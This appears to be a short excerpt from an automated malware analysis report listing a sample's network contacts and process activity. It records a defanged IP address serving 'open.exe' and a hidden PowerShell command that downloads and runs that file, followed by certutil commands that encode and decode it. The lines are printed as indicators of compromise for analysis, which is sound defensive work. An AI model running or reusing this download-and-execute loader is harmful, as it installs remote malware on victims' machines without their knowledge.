Technical information
- http://14#.#17.90.64/open.exe as open.exe
- '14#.#17.90.64':80
- '14#.#17.90.64':443
- 'microsoft.com':80
- http://14#.#17.90.64/open.exe
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- '14#.#17.90.64':443
- DNS ASK microsoft.com
- '%WINDIR%\syswow64\cmd.exe' /c powershell -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://14#.#17.90.64/open.exe', 'open.exe'); Start-Process open.exe -WindowStyle Hidden; certutil -f -encode op...
- '%WINDIR%\syswow64\certutil.exe' -f -encode open.exe open.enc 21418
- '%WINDIR%\syswow64\cmd.exe' /c certutil -f -decode open.enc open.exe 1852141679
- '%WINDIR%\syswow64\certutil.exe' -f -decode open.enc open.exe 1852141679